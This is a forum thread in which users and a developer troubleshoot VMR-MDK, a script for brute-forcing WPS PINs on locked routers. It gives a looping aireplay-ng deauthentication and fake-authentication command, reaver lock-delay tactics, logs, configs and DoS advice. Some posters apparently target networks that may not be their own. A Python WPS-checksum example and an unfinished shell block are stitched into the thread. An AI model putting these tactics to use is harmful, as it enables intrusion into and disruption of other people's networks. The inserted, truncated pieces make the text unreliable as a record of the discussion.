
Thread: VMR-MDK-K2-011x8.sh for Kali2.0

  1. #101
    Join Date
    2016-Apr
    Posts
    5
    Hey guys, I'm new here and fairly new (2 years) to pentesting routers. I managed to successfully penetrate a few networks last year using both reaver with pixiedust and through dictionary attacks. Recently I've been on the move again and found your awesome tool. I understand that it is intended specifically for locked WPS intrusion; however, I seem to have made no progress. The tool is working as it should (tested against a few APs that I already have the PSK for), but for any new APs, specifically locked APs, the script doesn't seem to give up any more pins. On top of that, it seems to have locked the APs for over 48 hours. Is this normal?
    Finally, somebody mentioned earlier in the thread that they have identified an AP which is listed as unlocked WPS, but reaver treats it as though it is locked. I have a similar AP and would LOVE to breach it. It says WPS is not locked, but neither reaver nor vmr-mdk manages to get past the initial sending identity response. Have you guys ever encountered a router like this? If so, how did you work around it?
    I believe it's a Zyxel chipset, 5c:f4:ab

    P.s. awesome that someone released a script to run this process, my fingers were not fast enough!

  2. #102
    Join Date
    2013-Jul
    Posts
    844
    As MTeams notes in the help files, the VMR-MDK process only works on a small subset of routers.

    If the router's WPS system is open but simply not responding, you can try these techniques.

    Method One

    Use varmacscan for a few days

    https://forums.kali.org/showthread.p...released/page5

    Method Two

    If you wish to focus your reaver attack specifically at one target that is not responding, use reaver from the command line, then:

    Open a second terminal window and run this from the command line.

    while true; do aireplay-ng -0 10 -a 55:44:33:22:11:00 mon0; sleep 2; aireplay-ng -1 10 -a 55:44:33:22:11:00 mon0; sleep 5; done

    The MAC address here would be the MAC address of your target.
    mon0 is your monitor interface (mon0, wlan0mon, etc.).

    If you get a complete pixiedust data sequence, use PDDSA-06.sh. Capture the text from the screen, save it to the VARMAC_LOGS directory and check it with PDDSA-06.sh. MTeams broke a non-responding router this way two days ago.

    MTeams
    Last edited by mmusket33; 2016-04-29 at 06:04.

  3. #103
    Join Date
    2016-Apr
    Posts
    5
    Great. Thanks for your feedback guys. I'll try this out after work today (already had varmacscan running for around 12 hours). The second method is basically a deauth-fakeauth process in aireplay, right? Is it worth using a known client MAC as well, or shall I just let it go with a random spoof?

  4. #104
    Join Date
    2016-May
    Posts
    5
    @mmusket33.

    Thank you very much for your great work!
    I used the VMR-MDK script for Kali 2016 and it started to collect pins like a charm against a Technicolor AP 582n.
    The problem is that after a variable number of pins, the reaver count suddenly restarts from the beginning.
    The access point is always responsive to the attack, but I can't figure out why the reaver count restarts.

  5. #105
    Join Date
    2013-Jul
    Posts
    844
    To Stem83

    The program has a retest pin 12345670 every x cycles feature. When the program retests it includes a --session= in the reaver command line so the brute force count is not upset. The program will test the pin for 120 seconds and then return to the brute force count on the next cycle.

    Try turning off the retest feature in the configuration file during program setup. Change the y to n. However in the end it is best to use this feature. Read the help files for reasons which include getting a complete pixie dust data sequence.

    The only other way the count can be upset to our knowledge is if you jump between using --dh-small and not using.


    To test, turn off the retest pin feature and the brute force count should return to the previous brute force setting. If you still have problems please advise.

    MTeams
    Last edited by mmusket33; 2016-05-18 at 06:18.

  6. #106
    Join Date
    2016-May
    Posts
    5
    Quote Originally Posted by mmusket33 View Post
    To Stem83

    The program has a retest pin 12345670 every x cycles feature. When the program retests it includes a --session= in the reaver command line so the brute force count is not upset. The program will test the pin for 120 seconds and then return to the brute force count on the next cycle.

    Try turning off the retest feature in the configuration file during program setup. Change the y to n. However in the end it is best to use this feature. Read the help files for reasons which include getting a complete pixie dust data sequence.

    The only other way the count can be upset to our knowledge is if you jump between using --dh-small and not using.


    To test, turn off the retest pin feature and the brute force count should return to the previous brute force setting. If you still have problems please advise.

    MTeams
    @mmusket33.

    Thank you very much for your prompt reply. :-)
    I already tried to turn off the retest pin feature yesterday and set the retest frequency to 99999, but after it collected about 3000 pins it restarted again with 12345670, without storing any previous session. It's really strange; I never modified the --dh-small option, so yesterday I tried to brutally delete lines 7287 to 7745, with the retest functions, from the script.
    Now it has collected about 1500 pins; I'll let you know soon how it goes.

  7. #107
    Join Date
    2013-Jul
    Posts
    844
    To Stem83

    Please keep us advised. We are not encountering this with Kali 1.1 or 2.0. We do know that for reaver to save its pin count, reaver has to be shut down in a certain manner. But since your program is saving its pin counts, the shutdown procedure works.

    1. What version are you using ?
    2. What type of operating system, i.e. hard drive install, persistent USB, virtual, etc.?

    We will try and induce this failure.

    Note we do not support any virtual mode installs or persistent USB using LUKS encryption. However, hard drive installs and persistent USB installs are fine. Live installs will not work as you cannot save between reboots.

    MTeams
    Last edited by mmusket33; 2016-05-20 at 05:48.

  8. #108
    Join Date
    2016-May
    Posts
    5
    To mmusket33:

    I use a kali-linux-2016.1 x64 persistent live USB with LUKS encryption.
    Here is some useful info:

    root@kali:~# uname -a
    Linux kali 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux

    root@kali:~# reaver
    Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212

    root@kali:~# mdk3
    MDK 3.0 v6(mod-musket-r1) - "**** the censorship" by ASPj of k2wrlz, using the osdep library from aircrack-ng And with lots of help from the great aircrack-ng community: Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape, telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik THANK YOU! MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. IMPORTANT: It is your responsibility to make sure you have permission from the network owner before running MDK against it. This code is licenced under the GPLv2

    root@kali:~# lspci | grep Network
    02:00.0 Network controller: Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

    root@kali:~/VARMAC_LOGS# cat TNCAPXXXXXX-XXXXXX-XX:XX-XXXXXX
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212
    [+] Switching mon0 to channel 6
    [+] p1_index set to 3129
    [+] p2_index set to 0
    [+] Restored previous session
    [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TNCAPXXXXXX)
    [+] Starting Cracking Session. Pin count: 3129, Max pin attempts: 11000
    [+] Trying pin 31225670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: XX:XX:XX:XX:XX:XX
    [P] PKE: XX:XX:XX:XX:XX:XX
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Name: Technicolor TG
    [P] WPS Model Number: 582n
    [P] Access Point Serial Number: XXXXXXXXX
    [+] Received M1 message
    [P] R-Nonce: XX:XX:XX:XX:XX:XX
    [P] PKR: XX:XX:XX:XX:XX:XX
    [P] AuthKey: XX:XX:XX:XX:XX:XX
    [+] Sending M2 message
    [P] E-Hash1: XX:XX:XX:XX:XX:XX
    [P] E-Hash2: XX:XX:XX:XX:XX:XX
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 3130
    [+] Pin count advanced: 3130.
    --------------------------------------------------------
    [+] Pin count advanced: 3136. Max pin attempts: 11000
    [+] Trying pin 31295673.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: XX:XX:XX:XX:XX:XX
    [P] PKE: XX:XX:XX:XX:XX:XX
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Name: Technicolor TG
    [P] WPS Model Number: 582n
    [P] Access Point Serial Number: XXXXXXXXX
    [+] Received M1 message
    [P] R-Nonce: XX:XX:XX:XX:XX:XX
    [P] PKR: XX:XX:XX:XX:XX:XX
    [P] AuthKey: XX:XX:XX:XX:XX:XX
    [+] Sending M2 message

    root@kali:~/VARMAC_CONFIG# cat TNCAPXXXXXX-XXXXXXXXXXXX
    CHANNEL1=6
    USE_R1=y
    RX1=9
    RY1=2
    LIVE1=240
    USE_LONG1=y
    MDKTYPE1=3
    MDKLIVE=1
    PAUSE=1
    REAVER_COUNT=y
    MDK3_COUNT=y
    WASH_COUNT=y
    DAMP_MDK=y
    ADVAN_TIME=120
    USE_AIRE1=y
    USE_AIRE0=n
    USE_DHSMALL=y
    MACSEL=n
    ASSIGN_MAC=XX:XX:XX:XX:XX:XX
    USE_PIXIE=n
    USE_FIRSTPIN=n
    RETESTPIN=999999
    Last edited by g0tmi1k; 2018-02-13 at 13:19. Reason: use of coarse language in output

  9. #109
    Join Date
    2013-Jul
    Posts
    844
    To Stem 83

    Thanks for the info:

    First, you might set
    RETESTPIN=50

    as we never tested such a long cycle. But we doubt the problem is there.

    VMR-MDK was developed against real targets using kali-i386. It has never been tested using AMD or LUKS encryption.

    MTeams tried LUKS encryption, but the encryption process took too long to complete, causing other program processes to fail. We removed the encryption feature and programs ran normally again. So if we were to take a guess, the problem is there.

    Suggest you make a persistent USB install of Kali not using LUKS, and maybe not AMD, and see what occurs. If you can just turn off LUKS, try that. We gave up on LUKS a while ago. We know nothing about AMD.


    MTeams

  10. #110
    Join Date
    2016-May
    Posts
    1
    Hello MTeam,

    I have been trying to crack a WPS locked router and have been trying your script for the past few weeks, and I always get the same error:
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping... and it goes on
    I get this line after I specify mon0.

    I have not installed Kali on my Windows machine; I am live booting it from my pendrive. Version: kali-linux-2016.1-amd64.iso
    I have a Dell Inspiron N4030 with an Intel i3 processor.
    Network card: BCM43XX

    Please help me out.

  11. #111
    Join Date
    2016-May
    Posts
    5
    Quote Originally Posted by mmusket33 View Post
    To Stem 83

    Thanks for the info:

    First, you might set
    RETESTPIN=50

    as we never tested such a long cycle. But we doubt the problem is there.

    VMR-MDK was developed against real targets using kali-i386. It has never been tested using AMD or LUKS encryption.

    MTeams tried LUKS encryption, but the encryption process took too long to complete, causing other program processes to fail. We removed the encryption feature and programs ran normally again. So if we were to take a guess, the problem is there.

    Suggest you make a persistent USB install of Kali not using LUKS, and maybe not AMD, and see what occurs. If you can just turn off LUKS, try that. We gave up on LUKS a while ago. We know nothing about AMD.


    MTeams
    To mmusket33.

    Thank you for the advice, I'll give it a try and let you know. But is there any way to keep the pins already tested? Are they stored in the default /etc/reaver folder?

  12. #112
    Join Date
    2013-Jul
    Posts
    844
    To Stem83

    To find where your .wpc files are stored try typing:

    locate .wpc

    The storage folder moved around when the first pixiedust-modded reaver programs were installed over the existing reaver, but current versions store in the /etc/reaver folder as you note, or maybe /usr/local/etc/reaver.

    As you can see, the .wpc file is just a MAC address stripped of colons. You could copy the file to another folder, or copy it to the existing folder and place an XX at the beginning.

    To avoid conflict in the VMR-MDK series, when the --pin= command is used, a --session= command pointing to another location, with a text string at the beginning of the file name, is included in the command line to avoid any later brute force session using the file. So even if reaver sends the --session files to the same folder through its internal default, it cannot use them for any brute force sessions as there is a text string at the beginning. If you see a file testpin- or startpin-, these were written by the --session= command when a specific pin is used or the default pin is tested.

    We will run some tests on wpc storage of session files again and see what occurs.
    Last edited by mmusket33; 2016-05-21 at 09:57.

  13. #113
    Join Date
    2015-Aug
    Posts
    15
    Is it possible to run this on arm-64 bit?
    I'm running kali rolling on odroid c2 with 64-bit cpu.
    Thank you!
    root@kali-arm64:~/mdk3-v6# make
    make -C osdep
    make[1]: Entering directory '/root/mdk3-v6/osdep'
    Building for Linux
    make[2]: Entering directory '/root/mdk3-v6/osdep'
    make[2]: '.os.Linux' is up to date.
    make[2]: Leaving directory '/root/mdk3-v6/osdep'
    make[1]: Leaving directory '/root/mdk3-v6/osdep'
    root@kali-arm64:~/mdk3-v6# make install
    make -C osdep install
    make[1]: Entering directory '/root/mdk3-v6/osdep'
    Building for Linux
    make[2]: Entering directory '/root/mdk3-v6/osdep'
    make[2]: '.os.Linux' is up to date.
    make[2]: Leaving directory '/root/mdk3-v6/osdep'
    make[1]: Leaving directory '/root/mdk3-v6/osdep'
    install -D -m 0755 mdk3 //usr/local/sbin/mdk3
    root@kali-arm64:~/mdk3-v6# /root/mdk3-v6/mdk3
    -bash: /root/mdk3-v6/mdk3: cannot execute binary file: Exec format error

  14. #114
    Join Date
    2016-May
    Posts
    5
    To mmusket33.

    The mystery continues...
    As you suggested I used Kali 2.0 i386 persistent USB WITHOUT LUKS encryption and the pin count advanced without restarts as expected, but after some days of work I had this unexpected log:

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212
    [+] Switching mon0 to channel 1
    [+] p1_index set to 6904
    [+] p2_index set to 999
    [+] Restored previous session
    [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TNCAPXXXXXX)
    [+] Starting Cracking Session. Pin count: 10999, Max pin attempts: 11000
    [+] Trying pin 69019982.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: XXXXXXXXXXXXXXXXXXXX
    [P] PKE: XXXXXXXXXXXXXXXXXXXX
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Name: Technicolor TG
    [P] WPS Model Number: 582n
    [P] Access Point Serial Number: XXXXXXXXX
    [+] Received M1 message
    [P] R-Nonce: XXXXXXXXXXXXXXXXXXXX
    [P] PKR: XXXXXXXXXXXXXXXXXXXX
    [P] AuthKey: XXXXXXXXXXXXXXXXXXXX
    [+] Sending M2 message
    [P] E-Hash1: XXXXXXXXXXXXXXXXXXXX
    [P] E-Hash2: XXXXXXXXXXXXXXXXXXXX
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] p2_index set to 1000
    [+] Pin count advanced: 11000. Max pin attempts: 11000
    [+] Checksum mode was not successful. Starting exhaustive attack
    [+] p2_index set to 0
    [+] Trying pin 69011234.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: XXXXXXXXXXXXXXXXXXXX
    [P] PKE: XXXXXXXXXXXXXXXXXXXX
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Name: Technicolor TG
    [P] WPS Model Number: 582n
    [P] Access Point Serial Number: XXXXXXXXX
    [+] Received M1 message
    [P] R-Nonce: XXXXXXXXXXXXXXXXXXXX
    [P] PKR: XXXXXXXXXXXXXXXXXXXX
    [P] AuthKey: XXXXXXXXXXXXXXXXXXXX
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [P] E-Hash1: XXXXXXXXXXXXXXXXXXXX
    [P] E-Hash2: XXXXXXXXXXXXXXXXXXXX
    [+] Received M3 message
    [+] Sending M4 message
    [+] Session saved.

    And the p2 index restarted from 0.
    I'm a little bit confused now... What does "exhaustive attack" mean? And, according to the log file, it discovered only the first part (6901) of the pin, right?

  15. #115
    Join Date
    2013-Jul
    Posts
    844
    To sslx

    MTeams does not use ARM, hence we cannot test. Furthermore, our weekly HD test install of Kali-rolling seems to have finally been successful after update/upgrade, so we will recommence work with that operating system.

    To Stem83

    It looks like removing LUKS has stopped the pin count restart. You have simply checked all the WPS pins. The only things we could do in this case are:

    1. Restart the attack from the beginning. Remove the -a from the reaver command line and you should get asked if you want to restart.

    2. Try Kali 1.10a and reaver 1.3; we have found the older program sometimes works better. We used to keep a persistent USB install using reaver 1.3 for such cases.

    Reaver 1.3 was available; search the web for the download page and install instructions.

    Note in reaver 1.3 wash is called something else, maybe walsh, and you will have to use airodump-ng to obtain the channel.

    MTeams
    Last edited by mmusket33; 2016-05-26 at 23:21.
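    To make Stem83's question about the log concrete (which half of the pin was confirmed, and what "exhaustive attack" means), here is an added example that is not code from the thread, from reaver or from VMR-MDK. It relies only on the WPS PIN checksum rule from the WPS specification; the ordering in which reaver tries candidate pins is not reproduced, and the log excerpt is constructed around the two pins quoted in the log above.

```python
import re

# Constructed log excerpt for this example: the two PINs are the ones quoted
# in the reaver log above; the surrounding lines are typical reaver messages.
SAMPLE_LOG = """\
[+] Trying pin 69019982.
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Checksum mode was not successful. Starting exhaustive attack
[+] p2_index set to 0
[+] Trying pin 69011234.
"""

TRYING_RE = re.compile(r"\[\+\] Trying pin (\d{8})\.")


def wps_checksum(first_seven: int) -> int:
    """Checksum digit for the first seven PIN digits, as defined by the WPS spec.

    Digits in positions 1, 3, 5 and 7 (counting from the left) are weighted 3,
    the others 1; the checksum digit makes the weighted sum a multiple of 10.
    """
    if not 0 <= first_seven <= 9_999_999:
        raise ValueError("expected a value with at most seven digits")
    acc, n = 0, first_seven
    while n:
        acc += 3 * (n % 10)  # positions 7, 5, 3, 1 from the left
        n //= 10
        acc += n % 10        # positions 6, 4, 2 from the left
        n //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when an eight-digit PIN ends in the checksum digit the spec requires."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def split_pin(pin: str) -> tuple:
    """(first half, second half without its checksum, checksum digit).

    These are the halves the AP verifies separately: the first half is proven
    in M4 (the AP answers with M5 or a NACK), the second half in M6 (M7 or NACK).
    """
    return int(pin[:4]), int(pin[4:7]), int(pin[7])


def candidate_space(checksum_mode: bool = True) -> dict:
    """Worst-case attempt counts when the two halves are confirmed independently.

    First half: 10**4 values.  Second half: 10**3 while the eighth digit is
    derived from the checksum, 10**4 in reaver's "exhaustive" mode, entered
    when every checksum-valid second half has been rejected.  Candidate
    ordering (reaver tries well-known pins first) is deliberately not modelled.
    """
    p1 = 10 ** 4
    p2 = 10 ** 3 if checksum_mode else 10 ** 4
    return {"p1": p1, "p2": p2, "total": p1 + p2}


def nack_meaning(last_sent: str) -> str:
    """Which half a WSC NACK from the AP rejects, given the last message sent."""
    return {"M4": "first half wrong", "M6": "second half wrong"}.get(last_sent, "not a PIN decision")


def pin_mode(pin: str) -> str:
    """'checksum' if the tried PIN obeys the checksum rule, else 'exhaustive'."""
    return "checksum" if is_valid_pin(pin) else "exhaustive"


def summarize_log(log_text: str) -> list:
    """One record per 'Trying pin' line: halves, checksum validity and mode."""
    records = []
    for pin in TRYING_RE.findall(log_text):
        p1, p2, chk = split_pin(pin)
        records.append({"pin": pin, "p1": p1, "p2": p2, "checksum": chk,
                        "checksum_ok": is_valid_pin(pin), "mode": pin_mode(pin)})
    return records


if __name__ == "__main__":
    for rec in summarize_log(SAMPLE_LOG):
        print(rec)
    print("checksum mode:", candidate_space(True))
    print("exhaustive mode:", candidate_space(False))
```

    Run against the constructed excerpt, the first pin (69019982) has a valid checksum and the second (69011234) does not, which is exactly the switch from checksum mode to exhaustive mode the log announces; in both records p1 stays 6901, the half that had already been confirmed.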

  16. #116
    I got an error, and I need help to solve this.

    Enter Line Number of Selected TargetAP Here: 1




    You have chosen:

    1. xxxxxxxxx as the targetAPs' name.

    2. xxxxxxxxx as the targetAPs' mac address.

    Enter (y/Y) to confirm or (n/N) to try again.
    Y
    ./VMR-MDK-K2-2016R-011x9.sh: line 666: /root/VARMAC_CONFIG/configfiledetailed: Arquivo ou diretório não encontrado
    ./VMR-MDK-K2-2016R-011x9.sh: line 673: /root/VARMAC_CONFIG/xxxxxx-xxxxxxx: Arquivo ou diretório não encontrado

    ls: não é possível acessar /root/VARMAC_CONFIG: Arquivo ou diretório não encontrado

    Configuration files listed in the VARMAC_CONFIG folder.



    Select the config file to be used.
    A Configuration file xxxxxxxxxx-xxxxxxxx has been made for use
    with this target BUT any config file listed can be used.
    After selection the config file parameters will appear. You can review
    settings and make changes which will be written to the file choosen.

    Once the program is running, open the config file with leafpad,
    make any changes and save. The config file is loaded at the start of
    Stages II, III & IV.

    Enter Line Number of Config File Here:



    You have chosen as your configuration file.
    Enter (y/Y) to confirm or (n/N) to try again.
    y
    ./VMR-MDK-K2-2016R-011x9.sh: line 1142: /root/VARMAC_CONFIG/: Arquivo ou diretório não encontrado
    Arquivo ou diretório não encontrado = File or directory not found
    Não é possível acessar = is not possible to access


    How to solve this?

  17. #117
    Join Date
    2013-Jul
    Posts
    844
    To renan*

    MTeams looked at your problem. For some reason the config file is not being written to the folder. It is possible your script is corrupted as all these processes are automatic. If you are using one of the Spanish versions it is possible it got altered. MTeams corrected a previous version.


    Go thru the setup very carefully. You should see your config file in a drop down menu list.

    MTeams

  18. #118
    Join Date
    2015-May
    Posts
    25
    To Renan,

    Even I was facing the same issue,

    You can fix this by copying all the folders that VMR-MDK creates, for example VARMAC_CONFIG, LOGS etc.,

    and pasting them into the root/home folder, and then running the script. I hope this helps.

  19. #119
    Join Date
    2016-Jun
    Posts
    6
    I'm also facing some problems on Kali 2016. I can't get this script to work; I've read everything, even after 3 hours of searching. For some reason it doesn't scan for networks or show me the airodump and wash tabs. Would really appreciate some help, thanks!

  20. #120
    Join Date
    2016-Jun
    Posts
    3

    Script not resuming

    I'm having pretty much the same problem. I installed it successfully though, but the script stops at:

    usage: VMR-MDK-K2-2016R-011x9.sh <start|stop|check> <interface> [channel or frequency]"

    It seemed to me that the script isn't resuming as how it should.

    And also 2 questions. First, is installing mdk3 required/mandatory?
    Second, do you suggest having multiple wlan adapters to use? If yes, please recommend to me the latest and greatest in the range of $50 and below.

    Would appreciate the reply to be here or to my email: [email protected]

    Thank you very much!

  21. #121
    Join Date
    2016-Jun
    Posts
    6
    I got the script working after restarting my computer, but I've got the same issue now as described above me. Thanks for all the help, really appreciate it!
    Last edited by YssDiamond; 2016-06-26 at 19:19.

  22. #122
    Join Date
    2013-Jul
    Posts
    844
    To marsrolled and YssDiamond

    A common error with VMR-MDK by users is, when asked to enter the device, the user types the device (i.e. wlan0) rather than the line number of the device seen in the menu list of devices.

    Suggest carefully going thru the set up.


    Loading the modified version of mdk3 is not mandatory. This version is loaded to a folder in root and the VMR-MDK program will run that version if you select item 14 in the DDOS series. All other DDOS using mdk3 run from the installed version that comes with kali-linux.

    Reference wifi devices: MTeams is in no way any authority here and is NOT qualified to recommend any devices. We use the AWUS036H; it works for us. There is however a lot of commentary in these forums on other devices. Suggest you post your question there and some forum member may assist you.

  23. #123
    Join Date
    2016-Jun
    Posts
    6
    Thanks for the quick reply. I managed to get it to work: when I had to choose if I wanted to use wlan0 or mon0, wlan0 didn't work for me and only mon0 worked. @marsrolled, I suggest you try mon0 instead of wlan0. The other good news is varmacscan is also working now, for some weird reason. Thanks to you musket and marsrolled; if you need any help just message me or reply here and I'll try to help you!

  24. #124
    I've made another episode of my VMR series, showing you continuity. I received a lot of complaints from YouTube that the script doesn't continue, and some other stuff.
    Visit YouTube and search for "how to hack wps locked routers using vmr-mdk part 2".
    Hope you enjoy it,
    please like, share and subscribe.

  25. #125
    Join Date
    2015-May
    Posts
    25
    Hi Chunkinz,

    Saw the video and thank you for your efforts

    Just wanted to ask you: you attacked an unlocked WPS router. How about routers which are already locked, when you do a wash scan and WPS locked shows as YES? Can we still use VMR-MDK to crack it? I have routers which automatically lock after 5-6 failed WPS PIN tries. Please help! Thanks.

  26. #126
    Join Date
    2015-May
    Posts
    25
    Hi All,

    First of all thanks for this lovely script, but there are some concerns that I would like to point out.

    I don't know if this is normal or not, because the attack is not successful.

    Here are my observation:

    So after running VMR-MDK-K2-2016R-011x9 script on my router TP Link WR740N

    USB wireless adapter= TP Link WN722N
    Kali Linux 2016 rolling
    All updated

    Here are the results

    All settings as default with interface selected as Mon0


    ATTEMPT 1
    setting default as the script

    reaver result:
    p2 index set to 2
    10002
    90.95% complete

    aireplay-ng reception test= association successful AID: 1


    Client associated=yes
    EAPOL Flood attack

    wash WPS locked = NO

    ATTEMPT 2

    Reaver start/stop cycles remaining = 999
    p1 index set to 3
    pin count advanced 3
    0.03% complete
    WPS transaction failed code 0x0

    aireplay-ng reception test: association successful AID: 1

    Wash WPS locked= YES

    client associated= yes

    ATTEMPT 3

    Reaver = Warning: receive timeout occurred, and continues
    Sending EAPOL start request

    aireplay-ng reception test= association successful AID: 1

    Wash WPS locked= YES

    client associated= yes

    ATTEMPT 4

    WPS transaction failed code 0x04
    0.03% complete
    sending EAPOl start request
    trying PIN 1115670

    aireplay-ng reception test= association successful AID: 1

    client associated= yes, 2
    MDK3 DOS 1 and 2 = client still responding with 1500 packets

    Wash WPS locked=YES

    ATTEMPT 5

    Reaver start/stop cycles remaining = 996

    Reaver:
    Warning: receive timeout occurred, and continues
    sending EAPOl start request ( cycle continues)

    aireplay-ng reception test= association successful AID: 1

    Wash WPS locked= YES
    WPS not found
    2 clients still connected

    Router stops responding
    Default router page doesn't open up
    Restarted the router finally


    Please advise.

    Thanks.
    Last edited by machx; 2016-06-29 at 18:35.

  27. #127
    Join Date
    2013-Jul
    Posts
    844
    Reference the use of the VMR-MDK script.

    1. VMR-MDK is only effective against a SMALL number of routers.

    2. Users should read the help files before employing.

    3. The procedure for testing for the flaw is outlined there.


    Reference the attack outlined by machx

    ATTEMPT 1

    Reaver is running the default pin 12345670 attack

    Attempt 2

    Reaver starts the brute force attack against the WPS system. Status of WPS unclear, but the pin count increased.

    ATTEMPT 3 thru 5

    Router appears partially locked

    If the router provides more pins after resetting then this approach may work.

    If the router stays locked and no more pins collected the VMR-MDK approach will not work.

    Suggestion if VMR-MDK does not work

    Test to see if the router automatically unlocks the WPS system after x number of seconds

    From the command line(CL) run reaver

    Make sure the -L is NOT in the CL.

    Add the -l or --lock-delay to 100 "Set the time to wait if AP locks WPS pin attempt"

    With a -l 100 reaver will attempt to collect pins every 100 seconds.

    Run reaver and wait. If pin collection restarts just count the number of times reaver attempts to collect pins before pin count restarts.

    For example, if reaver tries 10 times before the pin count restarted, then 100 times 10 = 1000 seconds.

    Now set your -l to 1200 run reaver from the CL and sit back.

    You can tweak the 1200 lower if the attack develops a pattern.


    MTeams

  28. #128
    Join Date
    2015-May
    Posts
    25
    Thank you MTeam,

    I was wishing that you could take a look at my post, and you did.

    Thank you for your advice.

    I have observed that the router TP-Link WR740N is not vulnerable against this script.

    After the DOS attacks 1 and 2, the router stops responding to any devices.

    Router page doesn't show up, You have to manually restart the router.

    Even after restarting the router the PIN doesn't disable. You have to manually disable the PIN if you want to continue with the attack.

    The question is: If I install the old script which is VMR-MDK011x8 for Kali 1.1.0, will it work better than the new script on Kali 2016 rolling.

    I have heard that this script gives false results on most Kali 2016 rolling edition..

    Please advise MTeam.

    Thank you.

  29. #129
    Join Date
    2013-Jul
    Posts
    844
    Reference VMR-MDK011x8: this script cannot be run in Kali 2.0 and 2016.

    As for false results, MTeams is unsure which program is providing false results. MTeams has never seen any problems with the latest version.

    We do get a lot of commentary about pin counts, but this is because users do not read carefully about the retest pin feature. Furthermore, during setup many users input the wrong data, causing the program to fail. If you YouTube VMR-MDK you will find a new video that states VMR-MDK does not work because the user tested it against three routers. MTeams has no objection to the user stating the program was not effective against the routers attacked; however, during the setup the user input incorrect setup info.

    VMR-MDK is an administrative script. It just runs various processes already installed in robotic fashion. Most of the newer script's changes deal with avoiding network manager problems and handling differences in text output.

    If you have info on false results please provide details. We use the script all the time with 1.1, 2.0 and 2016 and have seen no problems. Normally if the router locks we run up VMR-MDK and see if the flaw exists. If the attack collects pins we continue; if not we try other tactics. VMR-MDK is just one small tool in the WPA toolbox.

    In closing, we have heard the Network Manager problems are finally being addressed and will eventually filter down to users.
    Last edited by mmusket33; 2016-06-30 at 14:25.

  30. #130
    Join Date
    2015-May
    Posts
    25
    Thank you for your advice.

    Could you let me know the settings you are using from 1 - 22?

    I have tried to switch setting 22 to N.

    Thank you M team.

    The settings that your team uses and has proven to be successful, we can try and test on our routers and tweak a bit to get the best out of it.

  31. #131
    Join Date
    2016-Jun
    Posts
    3


    To mmusket33:
    ----Yep, I rest assured that I typed the number associated with the adapter we used. But after a few tests, I found out that the adapter I'm using is a weak packet capturer and sender, to the point that it barely sends packets. I think that's one big contributor to why I'm failing. I'm getting an adapter in a few weeks after I get my paycheck. I'd also consider if it will work on the router I'm testing on and move on to the next if I'm failing. Also, how many wlan adapters do you suggest using on this particular tool? Thank you for replying, you're one good samaritan! We appreciate the tools you make! =)

    To YssDiamond:
    ----Thanks bro, but isn't mon0 the ethernet wired connection tho? Because I only have one wireless adapter but anyways ill give it a shot! And do you know the dlink-605L router? Just wanna know if u encountered one cause thats the router im currently testing. Kinda sensitive cause it took me only 5-7 attempts before it locked. And also, how many wlan adapters r u using?

  32. #132
    Join Date
    2013-Jul
    Posts
    844
    To machx

    Choosing 22 = n just removes the default pin recheck.

    If 22 = y/Y then the program runs two concurrent reaver attacks: a brute force attack checking all 11,000 WPS pins and, occasionally, a separate check of pin 12345670.

    It was found that some routers would reset their WPS system to 12345670 if subjected to constant DOS processes. If reaver had already checked this key at the very start of the attack, reaver would slowly check all the pins, climb to 99.99% and spin endlessly. If the attack was restarted, the WPS pin and WPA key would be found, and the key was always 12345670.

    It was also found that routers which never responded to any attempts to obtain pins for days would suddenly dump their WPS pin and WPA key. The key was always 12345670; then they would go back to being inert.

    To marsrolled

    The script only supports one adapter. MTeams sees no reason to use two. We tried DDOS with one adapter while trying to collect pins with a second device, but that never worked. We tried DDOS at the same time as running reaver with one adapter and, to our surprise, reaver could collect pins through the DDOS fog if the adapter conducted both operations. That approach probably needs to be looked at again.

    MTeams
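
    A worked illustration of the pin arithmetic behind the post above (the "11,000 WPS pins" and the 12345670 recheck), added here as an example; it is not code from VMR-MDK, reaver or anyone in the thread. It assumes the WPS PIN checksum rule from the Wi-Fi Simple Configuration specification and reaver's usual split of the search into a first-half and a second-half phase.

```shell
#!/bin/sh
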